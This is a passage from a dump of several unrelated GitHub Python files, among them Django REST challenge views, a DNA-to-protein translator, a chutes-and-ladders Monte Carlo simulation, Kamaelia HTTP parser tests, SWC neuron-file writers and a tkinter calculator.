delete(self, request, challenge_id, *args, **kwargs):\n challenge_instance = self.get_object(challenge_id)\n if not challenge_instance:\n return Response(\n {'res': 'Object with challenge id {} does not exist'.format(challenge_id)},\n status=status.HTTP_400_BAD_REQUEST\n )\n challenge_instance.delete()\n return Response(\n {'res': 'Object with challenge id {} deleted'.format(challenge_id)},\n status=status.HTTP_200_OK\n )\n\n\nclass ChallengeSchedulesApiView(APIView):\n @permission_classes([IsAuthenticated])\n def get(self, request, challenge_id, *args, **kwargs):\n try:\n challenge = Challenge.objects.get(challenge_id=challenge_id)\n except ObjectDoesNotExist:\n return Response(\n {'res': 'Object with challenge id {} does not exist'.format(challenge_id)},\n status=status.HTTP_400_BAD_REQUEST\n )\n challenge_schedules = ChallengeSchedule.objects.filter(challenge_id=challenge)\n serializer = ChallengeScheduleSerializer(challenge_schedules, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n\nclass ChallengeCompletionEntriesApiView(APIView):\n @permission_classes([IsAuthenticated])\n def get(self, request, challenge_id, *args, **kwargs):\n try:\n challenge = Challenge.objects.get(challenge_id=challenge_id)\n except ObjectDoesNotExist:\n return Response(\n {'res': 'Object with challenge id {} does not exist'.format(challenge_id)},\n status=status.HTTP_400_BAD_REQUEST\n )\n challenge_completion_entries = ChallengeCompletionEntry.objects.filter(challenge_schedule_id__challenge_id=challenge)\n serializer = ChallengeCompletionEntrySerializer(challenge_completion_entries, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n\nclass ChallengeSummaryApiView(APIView):\n @permission_classes([IsAuthenticated])\n def get(self, request, challenge_id, *args, **kwargs):\n try:\n challenge = Challenge.objects.get(challenge_id=challenge_id)\n except ObjectDoesNotExist:\n return Response(\n {'res': 'Object with challenge id {} does not exist'.format(challenge_id)},\n status=status.HTTP_400_BAD_REQUEST\n )\n\n challenge_schedules = ChallengeSchedule.objects.filter(challenge_id=challenge)\n\n # Result structure passed into the HTTP response at the end:\n result = {'headers': [], 'body': []}\n\n # Get the participating users:\n users = OrderedDict()\n for 
schedule in challenge_schedules:\n users[schedule.user_id.id] = schedule.user_id.username\n result['headers'] = ['date'] + [value for _, value in users.items()]\n\n logger.info('Creating summary for users: %s', users)\n\n # Generate the days of the challenge:\n no_of_days = (challenge.end_date - challenge.start_date).days + 1\n logger.info('Challenge summary start and end dates: %s - %s, delta: %s', challenge.start_date,\n challenge.end_date, no_of_days)\n date_entries = OrderedDict()\n for n in range(no_of_days):\n date_str = str(challenge.start_date + timedelta(days=n))\n date_entries[date_str] = OrderedDict()\n for _, name in users.items():\n date_entries[date_str][name] = OrderedDict()\n\n date_entries['Total'] = OrderedDict()\n for _, name in users.items():\n date_entries['Total'][name] = OrderedDict()\n\n logger.debug('Date entries: %s', date_entries)\n\n for schedule in challenge_schedules:\n username = schedule.user_id.username\n ch_type = schedule.challenge_type_id.name\n\n # Basic data: no. of days FROM schedule start date TO challenge end date\n no_of_days = (challenge.end_date - schedule.start_date).days + 1\n logger.debug('%s %s %s %s %s', username, schedule.start_date, schedule.day_frequency, no_of_days,\n schedule.daily_goal)\n\n # Adding the target entries based on the day frequency:\n date_delta = timedelta(days=schedule.day_frequency)\n d = schedule.start_date\n while d <= challenge.end_date:\n d_str = str(d)\n if ch_type not in date_entries[d_str][username]:\n date_entries[d_str][username][ch_type] = OrderedDict()\n date_entries[d_str][username][ch_type]['target'] = schedule.daily_goal\n date_entries[d_str][username][ch_type]['unit'] = schedule.challenge_type_id.unit\n d = d + date_delta\n\n # Adding the completion entries:\n total_completion = 0\n completion_entries = ChallengeCompletionEntry.objects.filter(challenge_schedule_id=schedule)\n for entry in completion_entries:\n date_str = str(entry.timestamp.date())\n if ch_type not in date_entries[date_str][username]:\n date_entries[date_str][username][ch_type] = OrderedDict()\n date_entries[date_str][username][ch_type]['unit'] = schedule.challenge_type_id.unit\n if 'completed' not in date_entries[date_str][username][ch_type]:\n date_entries[date_str][username][ch_type]['completed'] = 0.0\n current = date_entries[date_str][username][ch_type]['completed']\n date_entries[date_str][username][ch_type]['completed'] = current + entry.amount\n total_completion = total_completion + entry.amount\n\n total_dict = OrderedDict([('target', schedule.daily_goal * math.ceil(no_of_days / schedule.day_frequency)),\n ('unit', schedule.challenge_type_id.unit),\n ('completed', total_completion)])\n date_entries['Total'][username][ch_type] = total_dict\n\n logger.debug('Date entries: %s', json.dumps(date_entries, indent=2))\n\n for date_str, value in date_entries.items():\n value['date'] = date_str\n result['body'].append(value)\n\n logger.debug('Result: %s', json.dumps(result, indent=2))\n\n return Response(result, status=status.HTTP_200_OK)\n","repo_name":"laszlzso/ChallengeMe","sub_path":"back_end/challenge_me/challenge_app/challenge_views.py","file_name":"challenge_views.py","file_ext":"py","file_size_in_byte":9855,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"72572249765","text":"\ndef Transcription(dna):\n if len(dna)%3==0:\n print(\"The input DNA seq is \")\n print()\n print(dna)\n print()\n mrna=\"\"\n for i in dna:\n if i==\"A\":\n mrna+=\"U\"\n elif i==\"T\":\n 
mrna+=\"A\"\n elif i==\"C\":\n mrna+=\"G\"\n elif i==\"G\":\n mrna+=\"C\"\n return mrna\n else:\n print(\"Please enter a valid DNA sequence.\")\n \ndef mrna_seq(sequence):\n mrna_codons=[]\n for i in range(0,len(sequence),3):\n mrna_codons.append(sequence[i:i+3])\n return mrna_codons\n\ndef Translation(codons):\n proteins=[]\n for i in codons:\n if i==\"GCA\" or i==\"GCC\" or i==\"GCG\" or i==\"GCU\":\n proteins.append(\"Ala\")\n if i==\"AGA\" or i==\"AGG\" or i==\"CGA\" or i==\"CGC\" or i==\"CGG\" or i==\"CGU\":\n proteins.append(\"Arg\")\n if i==\"AAC\" or i==\"AAU\":\n proteins.append(\"Asn\")\n if i==\"GAC\" or i ==\"GAU\":\n proteins.append(\"Asp\")\n if i==\"UGC\" or i==\"UGU\":\n proteins.append(\"Cys\")\n if i==\"GAA\" or i==\"GAG\":\n proteins.append(\"Glu\")\n if i==\"CAA\" or i==\"CAG\":\n proteins.append(\"Gln\")\n if i==\"GGA\" or i==\"GGC\" or i==\"GGG\" or i==\"GGU\":\n proteins.append(\"Gly\")\n if i==\"CAC\" or i==\"CAU\":\n proteins.append(\"His\")\n if i==\"AUA\" or i==\"AUC\" or i==\"AUU\":\n proteins.append(\"Ile\")\n if i==\"UUA\" or i==\"UUG\" or i==\"CUA\" or i==\"CUC\" or i==\"CUG\" or i==\"CUU\":\n proteins.append(\"Leu\")\n if i==\"AAA\" or i==\"AAG\":\n proteins.append(\"Lys\")\n if i==\"AUG\":\n proteins.append(\"Met\")\n if i==\"UUC\" or i==\"UUU\":\n proteins.append(\"Phe\")\n if i==\"CCA\" or i==\"CCC\" or i==\"CCG\" or i==\"CCU\":\n proteins.append(\"Pro\")\n if i==\"AGC\" or i==\"AGU\" or i==\"UCA\" or i==\"UCC\" or i==\"UCG\" or i==\"UCU\":\n proteins.append(\"Ser\")\n if i==\"ACA\" or i==\"ACC\" or i==\"ACG\" or i==\"ACU\":\n proteins.append(\"Thr\")\n if i==\"UGG\":\n proteins.append(\"Trp\")\n if i ==\"UAC\" or i==\"UAU\":\n proteins.append(\"Tyr\")\n if i==\"GUA\" or i==\"GUC\" or i==\"GUG\" or i==\"GUU\":\n proteins.append(\"Val\")\n return proteins\n \ndef protein_seq(aminoacids):\n return(aminoacids)\n \ndef table(mrna,protein):\n merge=tuple(zip(mrna,protein))\n column_length=[]\n element_tup=2\n for i in range(element_tup):\n column_length.append(max(len(j[i])+2 for j in merge))\n for j in merge:\n for i in range(element_tup):\n print(j[i].ljust(column_length[i]),end=\" \")\n print()\n\ndef proteinseq(a):\n s=\"\"\n for i in a:\n s+=\"->\"+i\n return s\n \n \n \n \nsequence=Transcription(\"TTAGTGGGCAGAGTTGAGTACACAAGTAAC\")\ncodons=mrna_seq(sequence)\naminoacids=Translation(codons)\na=aminoacids\nprint(\"The corresponding mRNA sequence is: \")\nprint()\nprint(mrna_seq(sequence))\nprint()\nmrna=mrna_seq(sequence)\nprotein=protein_seq(aminoacids)\nprint()\nprint(\"In table form:\")\nprint(\"--------------\")\nprint(\"mRNA Protein\")\nprint(\"--------------\")\ntable(mrna,protein)\nprint(\"The protein sequence is:\")\nprint()\nprint(proteinseq(a))","repo_name":"li06072/Projects","sub_path":"pfunproject.py","file_name":"pfunproject.py","file_ext":"py","file_size_in_byte":3251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21549179714","text":"#GCD * LCM = product of the numbers!\r\nt=int(input())\r\nfor i in range(t):\r\n a,b=map(int,input().split())\r\n rep1=a; rep2=b\r\n while(True):\r\n if a==0 or b==0:\r\n break\r\n elif a>b:\r\n a%=b\r\n elif a 100: # Must land on 100 exactly\n Next = Start\n else:\n Next = Start + s\n if Next == 1:\n Next = 38\n elif Next == 4:\n Next = 14\n elif Next == 9:\n Next = 31\n elif Next == 16:\n Next = 7\n elif Next == 21:\n Next = 42\n elif Next == 28:\n Next = 84\n elif Next == 36:\n Next = 44\n elif Next == 48:\n Next = 26\n elif Next == 49:\n Next = 
11\n elif Next == 51:\n Next = 67\n elif Next == 56:\n Next = 53\n elif Next == 62:\n Next = 19\n elif Next == 64:\n Next = 60\n elif Next == 71:\n Next = 91\n elif Next == 80:\n Next = 100\n elif Next == 87:\n Next = 24\n elif Next == 93:\n Next = 73\n elif Next == 95:\n Next = 76\n elif Next == 98:\n Next = 78\n\n return Next\n\ndef main():\n n = 10**6\n winners = [[0, 0] for _ in range(n)]\n MaximumMoves = 200\n OneWins = 0\n TwoWins = 0\n MovesWhenOneWins = 0\n MovesWhenTwoWins = 0\n MaximumMovesExceeded = 0\n\n for i in range(n):\n winners[i] = ChutesAndLaddersGame(MaximumMoves)\n\n if winners[i][0] == 1:\n OneWins += 1\n MovesWhenOneWins += winners[i][1]\n elif winners[i][0] == 2:\n TwoWins += 1\n MovesWhenTwoWins += winners[i][1]\n else:\n MaximumMovesExceeded += 1\n\n OneWinsPercentage = 100 * OneWins / (OneWins + TwoWins)\n AverageMovesPerOneWin = MovesWhenOneWins / OneWins\n AverageMovesPerTwoWin = MovesWhenTwoWins / TwoWins\n\n print(f\"Player One wins {OneWinsPercentage:.2f}% of the time.\")\n print(f\"Average moves when Player One wins: {AverageMovesPerOneWin:.2f}\")\n print(f\"Average moves when Player Two wins: {AverageMovesPerTwoWin:.2f}\")\n print(f\"Maximum number of moves {MaximumMoves} exceeded {MaximumMovesExceeded} times\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"AppleKimCalvario/test","sub_path":"MonteCarlo.py","file_name":"MonteCarlo.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6377711445","text":"import unittest\n\nimport Axon\nimport Axon.Scheduler as Scheduler\nfrom Axon.Ipc import shutdown\nfrom HTTPParser import HTTPParser\n\nclass Recorder(Axon.Component.component):\n def __init__(self):\n super(Recorder, self).__init__()\n self.heard = []\n \n def main(self):\n while 1:\n yield 1\n while self.dataReady(\"inbox\"):\n temp = self.recv(\"inbox\")\n #print temp\n self.heard.append(temp)\n \n while self.dataReady(\"control\"):\n temp = self.recv(\"control\")\n \nclass HTTPParser_Test(unittest.TestCase):\n \"\"\"A set of tests for the HTTPParser class.\"\"\"\n def test_smokeTest(self):\n \"\"\"__init__ - Called with no arguments succeeds\"\"\"\n P = HTTPParser()\n self.assert_(isinstance(P, Axon.Component.component))\n \n def test_shutdownMessageCausesShutdown(self):\n \"\"\"main - If the component recieves a shutdown() message, the component shuts down\"\"\"\n P = HTTPParser()\n P.activate()\n\n P._deliver(shutdown(), \"control\")\n\n componentExit = False\n for i in xrange(2000):\n try:\n P.next()\n except StopIteration:\n componentExit = True\n break\n if not componentExit:\n self.fail(\"When sent a shutdown message, the component should shutdown\")\n \n def test_shouldPause(self):\n \"\"\"main - If the component receives no input it pauses\"\"\"\n P = HTTPParser()\n P.activate()\n\n componentExit = False\n for i in xrange(2000):\n if not P._isRunnable():\n break\n try:\n P.next()\n except StopIteration:\n componentExit = True\n break\n if componentExit or P._isRunnable():\n self.fail(\"If the component receives no input it should pause rather than busywait\")\n \n def test_validRequest(self): \n P = HTTPParser()\n R = Recorder()\n R.link( (P, \"outbox\"), (R, \"inbox\"))\n R.activate()\n P.activate()\n P._deliver(\"HEAD http://localhost/temp.txt?wibble&foo=bar HTTP/1.1\\r\\nConnection: keep-alive\\r\\nHost: localhost\\r\\n\\r\\n\", \"inbox\")\n componentExit = False\n for i in xrange(2000):\n if len(R.heard) > 0:\n break\n try:\n 
P.next()\n                R.next()\n            except StopIteration:\n                pass\n        \n        if len(R.heard) == 0:\n            self.fail(\"If the component receives a valid and complete HTTP request it should output a request object\")\n        else:\n            requestobject = R.heard[0]\n            if requestobject.get(\"uri-server\",\"\") != \"localhost\":\n                self.fail(\"If the component receives a valid and complete HTTP request it should output a request object containing the correct uri-server item\")\n            elif requestobject.get(\"raw-uri\",\"\") != \"/temp.txt?wibble&foo=bar\":\n                self.fail(\"If the component receives a valid and complete HTTP request it should output a request object containing the correct raw-uri item\")\n            elif requestobject.get(\"version\",\"\") != \"1.1\":\n                self.fail(\"If the component receives a valid and complete HTTP request it should output a request object containing the correct version item\")\n            elif requestobject.get(\"bad\",True) != False:\n                self.fail(\"If the component receives a valid and complete HTTP request it should output a request object containing \\\"bad\\\":False\")\n    \n    def test_incoherentRequest(self):\n        \"\"\"main - Non-HTTP requests are marked bad\"\"\"\n        P = HTTPParser()\n        R = Recorder()\n        R.link( (P, \"outbox\"), (R, \"inbox\"))\n        R.activate()\n        P.activate()\n        P._deliver(\"ecky\\n\\n\\n\\n\", \"inbox\")\n        componentExit = False\n        for i in xrange(2000):\n            if len(R.heard) > 0:\n                break\n            try:\n                P.next()\n                R.next()\n            except StopIteration:\n                pass\n        if len(R.heard) == 0:\n            self.fail(\"If the component receives non-HTTP requests it should send on a bad request message - none sent\")\n        elif not R.heard[0].get(\"bad\",False):\n            self.fail(\"If the component receives non-HTTP requests it should send on a bad request message\")\n    \nif __name__=='__main__':\n    unittest.main()\n","repo_name":"sparkslabs/kamaelia_","sub_path":"Sketches/RJL/test/test_HTTPParser.py","file_name":"test_HTTPParser.py","file_ext":"py","file_size_in_byte":4522,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"52"} +{"seq_id":"19416574534","text":"import os\n\n\ndef is_path_valid(file_path):\n    tmp_path, tmp_file = os.path.split(file_path)\n\n    if not os.path.exists(file_path):\n        if not os.path.exists(tmp_path):\n            os.makedirs(tmp_path)\n        new_file = open(file_path, \"w\")\n        new_file.close()\n\n    # if os.path.isdir(file_path):\n    #     raise PyNevalError(\"[Error: ] file: \\\"{}\\\" already exists in path: \\\"{}\\\" and it is a directory\"\n    #                        .format(tmp_file, tmp_path))\n    #     return False\n\n    return not os.path.isdir(file_path)\n\n\ndef save_line_tuple_as_swc(match_fail, file_path):\n    with open(file_path, \"w\") as f:\n        f.truncate()\n        f.write(\"# total unmatched edges: {}\\n\".format(len(match_fail)))\n        for line_tuple in match_fail:\n            f.write(line_tuple[0].to_swc_str())\n        f.write(\"# --End--\\n\")\n\n\ndef save_as_swc(object, file_path):\n    if not is_path_valid(file_path):\n        return False\n\n    if isinstance(object, set):\n        save_line_tuple_as_swc(object, file_path)\n\n\ndef print_line_tuple_swc(match_fail_set):\n    for line_tuple in match_fail_set:\n        print (\"pos_1: {}, pos_2 {}\".format(line_tuple[0]._pos, line_tuple[1]._pos))\n\n\ndef print_swc(object):\n    if isinstance(object, set):\n        print_line_tuple_swc(object)\n\n\ndef swc_save(swc_tree, out_path, extra=None):\n    out_path = os.path.normpath(out_path)\n    out_dir = os.path.dirname(out_path)\n\n    while not os.path.exists(out_dir):\n        print('[Info]: \"{}\" does not exist. 
Create new path?[y/n]'.format(out_dir))\n        choice = input()\n        if choice.lower() == 'y':\n            os.makedirs(out_dir)\n        elif choice.lower() == 'n':\n            print('[Info]: \"{}\" does not exist. Input new directory?[y/n]'.format(out_dir))\n            choice = input()\n            if choice.lower() == 'y':\n                print('[Info]: Input new directory')\n                out_dir = input()\n            elif choice.lower() == 'n':\n                return False\n        else:\n            continue\n    out_new_path = os.path.join(out_dir, os.path.basename(out_path))\n    while not out_new_path[-4:] == '.swc':\n        print('[Info]: \"{}\" is not a swc file. Input another path?[y/n]'.format(out_new_path))\n        choice = input()\n        if choice.lower() == 'y':\n            print('[Info]: Input new path:')\n            out_new_path = input()\n        elif choice.lower() == 'n':\n            return False\n\n    while os.path.exists(out_new_path):\n        print('[Info]: \"{}\" already exists. Overwrite?[y/n]'.format(out_new_path))\n        choice = input()\n        if choice.lower() == 'y':\n            break\n        elif choice.lower() == 'n':\n            return False\n\n    swc_node_list = swc_tree.get_node_list()\n    swc_tree.sort_node_list(key=\"id\")\n    with open(out_new_path, \"w\") as f:\n        f.truncate()\n        if extra is not None:\n            f.write(extra)\n        for node in swc_node_list:\n            if node.is_virtual():\n                continue\n            try:\n                f.write(\n                    \"{} {} {} {} {} {} {}\\n\".format(\n                        node.get_id(),\n                        node._type,\n                        node.get_x(),\n                        node.get_y(),\n                        node.get_z(),\n                        node.radius(),\n                        node.parent.get_id(),\n                    )\n                )\n            except:\n                continue\n    return True","repo_name":"SupermeLC/PyNeval","sub_path":"pyneval/io/swc_writer.py","file_name":"swc_writer.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"17311606492","text":"#Deixando o programa amigavel:\r\nprint('=' * 50)\r\nprint('{:^50}'.format('Banco 24hrs'))\r\nprint('='*50)\r\nvalor = int(input('Quanto você deseja sacar? 
R$ '))\r\nprint('')\r\n#Nomeando variaveis:\r\ntotal = valor\r\nced = 100\r\ntotced = 0\r\n#Tive que aprender esse código novo, pois eu não estava conseguindo fazer de outra forma que foi explicada na aula:\r\nwhile True:\r\n#Ele vai passar por esse If se o Valor Total for maior ou igual ao da cédula e adicionar mais 1 ao contador na cedula:\r\n\tif total >= ced:\r\n\t\ttotal = total - ced\r\n\t\ttotced = totced + 1\r\n#Quando ele esgotar as possibilidades com uma das cedulas ele vai printar quantas cedulas ele conseguiu tirar do total e qual era o valor da cedula:\r\n\telse:\r\n\t\tif totced > 0:\r\n\t\t\tprint('Você recebera {} cédula(as) de R$ {}'.format(totced,ced))\r\n#Depois ele vai trocar os valores da cedula até conseguir zerar o valor total informado no inicio do programa:\r\n\t\tif ced == 100:\r\n\t\t\tced = 50\r\n\t\telif ced == 50:\r\n\t\t\tced = 20\r\n\t\telif ced == 20:\r\n\t\t\tced = 10\r\n\t\telif ced == 10:\r\n\t\t\tced = 5\r\n\t\telif ced == 5:\r\n\t\t\tced = 1\r\n#É muito importante zerar as cedulas no final, pois se não o programa vai misturar a quantidade de todas as cedulas:\r\n\t\ttotced = 0\r\n#Quando ele conseguir zerar o valor total ele vai parar o looping:\r\n\t\tif total == 0:\r\n\t\t\tbreak\r\n#Abaixo é somente uma linha para deixar o programa mais amigavel:\r\nprint('\\nObrigado por usar nosso Banco 24hrs!\\n')\r\nprint('=' * 50)\r\nprint('{:^50}'.format('Volte Sempre!'))\r\nprint('='*50)","repo_name":"tiduswr/Algoritimos_P1_UEPB_CCEA_CAMPUS_VII","sub_path":"Lista 02/lista02ex13.py","file_name":"lista02ex13.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71246691685","text":"# -*- coding: utf-8 -*-\n\nfrom googletrans import Translator\nimport xml.etree.ElementTree as ET\nimport time\nimport xlwt\n\n#languages = [\"nl\", \"ru\", \"en\", \"es\", \"tr\"]\nlanguages = [\"tr\"]\n\nclusters = {\"RESTAURANT#GENERAL\", 'RESTAURANT#PRICES', 'RESTAURANT#MISCELLANEOUS', 'FOOD#PRICES', 'FOOD#QUALITY', 'FOOD#STYLE_OPTIONS', 'DRINKS#PRICES', 'DRINKS#QUALITY', 'DRINKS#STYLE_OPTIONS', 'SERVICE#GENERAL', 'AMBIENCE#GENERAL', 'LOCATION#GENERAL'}\n\ntranslator = Translator()\n\nlista_aspectos = []\n\narquivo = \"aspectos_\"+languages[0]+\".xls\"\nprint(arquivo)\n#Leitura dos Arquivos\nfor lang in languages:\n tree = ET.parse(lang+\".xml\")\n root = tree.getroot()\n for sentence in root.iter('sentence'):\n #texto = sentence.find('text').text.lower()\n for opinions in sentence.findall('Opinions'):\n for opinion in opinions.findall('Opinion'):\n target = opinion.attrib['target']\n #print(type(target))\n #print(target)\n #print(target, type(target))\n if target != 'NULL' and target != '':\n target = target.lower()\n #print(target, type(target))\n if lang != 'en':\n traducao = translator.translate(target, src=lang, dest='en').text\n time.sleep( 0.25 )\n else:\n traducao = target\n categoria = opinion.attrib['category']\n #print(type(target))\n repeticao = False\n for aspectos in lista_aspectos:\n if aspectos[0] == target and aspectos[2] == categoria:\n aspectos[4] = aspectos[4] + 1\n print(target.decode('cp1251'), \" REPETIDO \", aspectos[4], \" vezes\")\n repeticao = True\n if not repeticao:\n try:\n print(type(target), type(traducao))\n target = str(target.encode('utf8'))\n traducao = str(traducao.encode('utf8'))\n lista = [target, traducao, categoria, lang, 1]\n print(str(target.encode('utf8')), lista)\n print(type(target), type(traducao))\n except UnicodeEncodeError:\n 
print(\"\\t\\t\\tERRO: \", target, traducao, categoria, lang, 1)\n                        lista_aspectos.append(lista)\nprint(lista_aspectos)\n\n#Gravação dos dados em planilhas\nwb = xlwt.Workbook(encoding=\"UTF-8\")\n\nfor categoria in clusters:\n    ws = wb.add_sheet(categoria)\n    # Títulos das colunas\n    titles = [\"Aspecto\",\"Tradução\", \"Idioma\", \"TF\"]\n    # Escrevendo títulos na primeira linha do arquivo\n    for i in range(len(titles)):\n        ws.write(0, i, titles[i])\n\n    i = 1\n    for aspecto in lista_aspectos:\n        if aspecto[2] == categoria:\n            # Escrevendo o identificador na 1ª coluna da linha i\n            ws.write(i, 0, aspecto[0])\n            ws.write(i, 1, aspecto[1])\n            ws.write(i, 2, aspecto[3])\n            ws.write(i, 3, aspecto[4])\n            ws.write(i, 4, aspecto[2])\n            i += 1\n    \n# Salvando\nwb.save(arquivo)\n\n","repo_name":"lucasrafaelc/Mapeamento-Aspectos-Multil-ngues","sub_path":"Arquivos de Aspectos/lista_aspectos.py","file_name":"lista_aspectos.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10154377381","text":"number, height = map(int, input().split())\nmin_heights = [int(i) for i in input().split()]\n\ncount = 0\nfor min_height in min_heights:\n    if height >= min_height:\n        count += 1\n\nprint(count)\n\n\nimport time\ndef funcion_con_timeout():\n    start_time = time.time()\n    stack_tiring = []\n\n    d, c, r = map(int, input().split())\n\n    for i in range(c):\n        stack_tiring.append(int(input()))\n\n    for i in range(r):\n        d += int(input())\n\n    count = r\n    for val in stack_tiring:\n        if(d >= val):\n            count+=1\n            d -= val\n        else:\n            break\n    print(count)\n    end_time = time.time()\n    elapsed_time = end_time - start_time\n    return elapsed_time\n    \ntiempo_transcurrido = funcion_con_timeout()\nprint(f\"El proceso tomó {tiempo_transcurrido} segundos\")\n","repo_name":"Rafterminador/ICPC-2023","sub_path":"problem-A.py","file_name":"problem-A.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13366051770","text":"from __future__ import absolute_import\r\nimport sys\r\nimport locale\r\nimport i18n_core\r\nimport babel\r\n\r\nfrom wx_utils import forms as wx_forms\r\nfrom gui_builder import fields\r\nimport app_elements\r\napplication = app_elements.find_application_module()\r\n\r\nclass LanguageSelectionPanel(wx_forms.AutoSizedPanel):\r\n\tlanguage = fields.ComboBox(label=__(\"Application &Language (requires restart)\"), read_only=True)\r\n\r\n\tdef __init__(self, *args, **kwargs):\r\n\t\tsuper(LanguageSelectionPanel, self).__init__(*args, **kwargs)\r\n\t\tlocales = list(i18n_core.get_available_locales(application.name))\r\n\t\tif sys.version_info[0] < 3:\r\n\t\t\tself.locales = sorted(locales, key=lambda i: i.language, cmp=locale.strcoll)\r\n\t\tself.locales = sorted(locales, key=lambda i: locale.strxfrm(i.language))\r\n\r\n\tdef render(self, *args, **kwargs):\r\n\t\tsuper(LanguageSelectionPanel, self).render(*args, **kwargs)\r\n\t\tlocales = [u\"{name} ({english_name})\".format(name=i.language_name, english_name=i.english_name) for i in self.locales]\r\n\t\tself.language.set_value(locales)\r\n\t\tcurrent_locale = application.locale.split('.')[0]\r\n\t\tlanguages = [i.language for i in self.locales]\r\n\t\ttry:\r\n\t\t\tindex = languages.index(current_locale.split('_')[0])\r\n\t\texcept ValueError:\r\n\t\t\tindex = languages.index(i18n_core.DEFAULT_LOCALE.split('_')[0])\r\n\t\tself.language.set_index(index)\r\n\r\n\tdef set_config_values(self):\r\n\t\tlocale = 
self.locales[self.language.get_index()]\r\n\t\tif 'UI' not in application.config:\r\n\t\t\tapplication.config['UI'] = {}\r\n\t\tlocale_id = locale.language\r\n\t\tif locale.territory:\r\n\t\t\tlocale_id += \"_%s\" % locale.territory\r\n\t\tapplication.config['UI']['language'] = locale_id\r\n","repo_name":"accessibleapps/app_elements","sub_path":"app_elements/i18n.py","file_name":"i18n.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"8703227197","text":"def count_islands(grid):\n \"\"\"\n Input: 2D matrix, each item is [x, y] -> row, col.\n Output: number of islands, or 0 if found none.\n Notes: island is denoted by 1, ocean by 0 islands is counted by continuously\n connected vertically or horizontally by '1's.\n It's also preferred to check/mark the visited islands:\n - eg. using the helper function - mark_islands().\n \"\"\"\n islands = 0 # var. for the counts\n for r, row in enumerate(grid):\n for c, val in enumerate(row):\n if grid[r][c] == 1:\n islands += 1\n mark_islands(r,c,grid)\n print(r, c, islands)\n return islands\n\n\ndef mark_islands(i, j, grid):\n \"\"\"\n Input: the row, column and grid\n Output: None. Just mark the visited islands as in-place operation.\n \"\"\"\n if (i>=0) and (j>=0) and (i<=len(grid)-1) and (j<=len(grid[i])-1):\n print(f'inside mark_islands row:{i} column:{j} value:{grid[i][j]}')\n if grid[i][j] == 1:\n grid[i][j] = '#' # one way to mark visited ones - suggestion.\n mark_islands(i-1, j, grid)\n mark_islands(i+1, j, grid)\n mark_islands(i, j-1, grid)\n mark_islands(i, j+1, grid)\n\n\nsquares = [[1, 1, 0, 1],\n [1, 1, 0, 1],\n [0, 0, 1, 1],\n [1, 1, 1, 0]]\n\n\nprint(count_islands(squares))\n","repo_name":"syurskyi/Python_Topics","sub_path":"125_algorithms/_examples/_algorithms_challenges/pybites/topics/Algorithms/263/islands.py","file_name":"islands.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"28636213366","text":"#!/usr/local/bin/python3\n\nimport random\n\n\ndef random_string(length):\n return \"\".join(random.choice('ACTG') for _ in range(length))\n\n\nfile_name = \"random_strings.txt\"\nfile = open(file_name, \"w\")\n\nn = 100\n\nlength = 540\ntarget_start = 161\ntarget_length = 160\ntarget_end = target_start + target_length\nend = \"\\n\"\nseparator = \" \"\n\nprimer_1 = \"GTCCTTTGATTCTCCTGTCC\"\nprimer_2 = \"GCTCCCTACCACCATTTACT\"\n# primer_1 = random_string(20)\n# primer_2 = random_string(20)\n\nfor i in range(n):\n oligo = random_string(target_length)\n seq_start = random_string(target_start - 1 - 20)\n seq_end = random_string(length - 20 - target_start - target_length)\n sequence = seq_start + separator + primer_1 + separator + oligo + separator + primer_2 + separator + seq_end\n print(sequence)\n","repo_name":"miskiewiczm/primers_2","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"621181385","text":"import tkinter\nfrom tkinter import *\nfrom tkinter import messagebox\n\nv=\"\"\na=0\no=\"\"\ndef one():\n global v\n v+=\"1\"\n data.set(v)\ndef two():\n global v\n v+=\"2\"\n data.set(v)\ndef three():\n global v\n v+=\"3\"\n data.set(v)\ndef four():\n global v\n v+=\"4\"\n data.set(v)\ndef five():\n global v\n v+=\"5\"\n data.set(v)\ndef six():\n global v\n v+=\"6\"\n data.set(v)\ndef 
